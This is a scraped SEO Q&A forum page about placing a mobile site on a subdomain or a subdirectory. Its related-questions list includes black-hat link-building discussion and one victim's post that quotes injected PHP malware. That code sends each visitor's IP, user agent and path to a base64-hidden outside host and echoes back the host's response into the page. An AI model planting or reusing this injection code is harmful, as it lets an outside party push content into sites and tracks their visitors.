Mobile SEO best practices : Should my mobile website be located at m.domain.com or domain.com/mobile?
-
I'd like to know if there's any difference between using m.domain.com/pages or domain.com/mobile/pages for a mobile website? Which one is better? Why? Does Google treat the two differently? As you can see, I'm new to this! This is my first time working on a mobile website, so any links/resources would be highly appreciated. Thanks!
-
As Collin already states: this is just part of the regular old discussion about 1) subdirectory, 2) subdomain or 3) different domain. So SEO wise you should think about that. But also, you should think about how your desktop version of the website related to the (tablet?) mobile version of the website. There's multiple approaches:
- Responsive design (all on the same domain, using the same URL's)
- Separate mobile website and desktop website
- Mobile website on subdomain (m.blaa.com)
- Mobile website on separate domain
In order to help you choose, see below:
Responsive design vs. mobile website
For regular websites using responsive design is a good solution. Except for the case in which the HTML and assets are quite large for a mobile device to load. In that case I always prefer to use a mobile version of the website on a subdomain.
I believe this is the best solution for high traffic websites which need to show quite some content per page.
-
I think it is better to use media queries and JavaScript on the same domain rather than using a subdomain. It makes efforts with SEO, site maintenance, content updates etc etc so much more efficient.
-
Even with proper rel=canonicals in place, there's still an issue of having multiple urls and having links and social signals go to two different urls with the same content rather than just one url.
I'd pick a single URL for all content. Mobile visitors should received optimized pages via responsive or adaptive design. I do it via user-agent detection, and I serve optimized versions to either desktops, tablets or phones using the 'same url'.
-
In short, they each have their own benefits
- m.domain.com lives in it's own world and is easier to make sweeping changes to and such
- domain.com/mobile leverages the existing strength of your domain
If you'd like to read more on it, here's an article that explains it a little more in depth... I won't bother just re-stating it all here.
http://plussearchmarketing.com/search/2012/03/mobile-urls-for-seo/
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
SEO - All topic related pages in same directory?
Hey Mozzers, How would you structure the following pages for SEO. The site is a multi-product / multi-topic site, but all pages in this example are based on a single topic - CRM Software: CRM Software product CRM Software related blog post 1 CRM Software related blog post 2 CRM Software related blog post 3 CRM Software downloadable resource 1 CRM Software downloadable resource 2 CRM Software downloadable resource 3 I know building directory pyramids is a bit old hat nowadays, but I still see the odd website organising the above pages, as follows: /crm-software /crm-software/crm-blog-post-1 /crm-software/crm-blog-post-2 /crm-software/crm-blog-post-3 /crm-software/crm-resource-1 /crm-software/crm-resource-2 /crm-software/crm-resource-3 However, I'm more inclined to apply a more logical structure, as follows: /crm-software /blog/crm-blog-post-1 /blog/crm-blog-post-2 /blog/crm-blog-post-3 /resources/crm-resource-1 /resources/crm-resource-2 /resources/crm-resource-3 What would you say is SEO best practice? Thanks!
White Hat / Black Hat SEO | | Zoope0 -
I am tempted to purchase a listing on an industry specific website directory with high domain authority. Will that be frowned upon as buying links?
I am tempted to purchase a listing on an industry specific website directory (http://marketingresourcedirectory.ama.org/) with high domain authority. Will that be frowned upon as buying links?
White Hat / Black Hat SEO | | SearchParty0 -
Why does expired domains still work for SEO?
Hi everyone I’ve been doing an experiment during more than 1 year to try to see if its possible to buy expired domains. I know its considered black hat, but like I said, I wanted to experiment, that is what SEO is about. What I did was to buy domains that just expired, immediately added content on a WP setup, filled it with relevant content to the expired domain and then started building links to other relevant sites from these domains.( Here is a pretty good post on how to do, and I did it in a similar way. http://searchenginewatch.com/article/2297718/How-to-Build-Links-Using-Expired-Domains ) This is nothing new and SEO:s has been doing it for along time. There is a lot of rumors around the SEO world that the domains becomes worthless after they expire. But after trying it out during more than 1 year and with about 50 different expired domains I can conclude that it DOES work, 100% of the time. Some of the domains are of course better than others, but I cannot see any signs of the expired domains or the sites i link to has been punished by Google. The sites im liking to ranks great ONLY with those links 🙂 So to the question: WHY does Google allow this? They should be able to see that a domain has been expired right? And if its expired, why dont they just “delete” all the links to that domain after the expiry date? Google is well aware of this problem so what is stopping them? Is there any one here that know how this works technically?
White Hat / Black Hat SEO | | Sir0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
SEO from INDIA Smarter then Google?
Exploring this url: filterscanada.ca In Open Site Explorer, it is clear those guys bought one of those package available on site like eLance.com a low price over seas!!! Where freelancer around the word can be hired for a fews bucks. For example, I post a job on eLance for SEO and most of the freelancer submitting where from INDIA. For just a few hundreds dollars, you can get a complet SEO package. At first, the price was attractive, but when posting on seoMoz and doing research, I came to the conclusion, the techniques they use might hurt more the produce positive result... How can you get a D.A. of 45 using backlinks they get? I read all those things about Google algorithm, and Panda and Penguin and this and that... Being impossible to crack! Do you have a explanation? I work really hard ans spends lots of $$$ to have a clean site selling furnace filters
White Hat / Black Hat SEO | | BigBlaze205
I follow all the SEO guide lines, practice only white hat trying to built somethings, but with a P.A. of 19 and a competitors ranking like this, I ask myself: "Maybe INDIA is smarter then Google and I should do like this site, spend a couple of hundreds dollars and buy myself a high D.A."0 -
Press Releases and SEO in 2013
Mozers, A few questions for the community: Distributing a press release through a service like 24-7pressrelease.com - is it a serious duplicate content issue when an identical press release is distributed to multiple sites with no canonical markup (as far as I can tell)? All of the backlinks in the press release are either nofollow or redirects. If there IS a duplicate content issue, will the website be affected negatively given the numerous Panda and Penguin refreshes? Why SHOULDN'T a company issue a press release to multiple sites if it actually has something legitimate to announce and the readership of a given site is the target demographic? For example, why shouldn't a company that manufactures nutritional health supplements issue the same press release to Healthy Living, Lifestyle, Health News, etc _with a link to the site?_I understand it's a method that can be exploited for SEO purposes, but can't all SEO methods be taken to an extreme? Seems to me that if this press release scenario triggers the duplicate content and/or link spam penalty(ies), I'd consider it a slight deficiency of Google's search algorithm. Any insight would be much appreciated. Thanks.
White Hat / Black Hat SEO | | b40040400 -
EXPERT CHALLENGE: What link building strategies do YOU think will work after the latest 3/29/2012 Google algorithm change?
FOR ALL SEO THOUGHT LEADERS...What link building strategies do YOU think will work after the latest 3/29/2012 Google algorithm change? NOTE: My hope is that the responses left on this thread will ultimately benefit all members of the community and give recognition to the true thought leaders within the SEO space. That being said, my challenge is a 2 part question: With the 80/20 rule in mind, and in light of recent algorithm changes, what would YOU focus most of your SEO budget on if you had to choose? Let's assume you're in a competitive market (ie #1-5 on page 1 has competitors with 20,000+ backlinks - all ranging from AC Rank 7 to 1). How would you split your total monthly SEO budget as a general rule? Ex) 60% link building / 10% onsite SEO / 10% Social Media / 20% content creation? I realize there are many "it depends" factors but please humor us anyways. Link building appears to have become harder and harder as google releases more and more algorithm changes. For link building, the only true white hat way of proactively generating links (that I know of) is creating high quality content that adds value to customers (ie infographics, videos, etc.), guest blogging, and Press Releases. The con to these tactics is that you are waiting for others to find and pick up your content which can take a VERY long time, so ROI is difficult to measure and justify to clients or C-level management. That being said, how are YOU allocating your link building budget? Are all of these proactive link building tactics a waste of time now? I've heard it couldn't hurt to still do some of these, but what are your thoughts and what is / isn't working for you? Here they are: A. Using spun articles edited by US based writers for guest blog content B. 301 Redirects C. Social bookmarking D. Signature links from Blog commenting E. Directory submissions F. Video Submissions G. Article Directory submissions H. Press release directory submissions I. Forum Profile Submissions J. Forum signature links K. RSS Feed submissions L. Link wheels M. Building links (using scrapebox, senukex, etc.) to pages linked to your money site N. Links from privately owned networks (I spoke to an SEO company that claims to have over 4000 unique domains which he uses to boost rankings for his clients) O. Buying Contextual Text Links All Expert opinions are welcomed and appreciated 🙂
White Hat / Black Hat SEO | | seoeric2 -
Buying a website and redirecting everything
We are considering purchasing an existing website in our industry with a domain authority of 52 and 20K inlinks and redirecting it to our new website with a domain authority of 26 and 1,000 inlinks. Would this be the best way to improve our new site's authority and inlinks? Would Google penalize us for doing that or would it effectively transfer the old sites authority to us?
White Hat / Black Hat SEO | | pbhatt0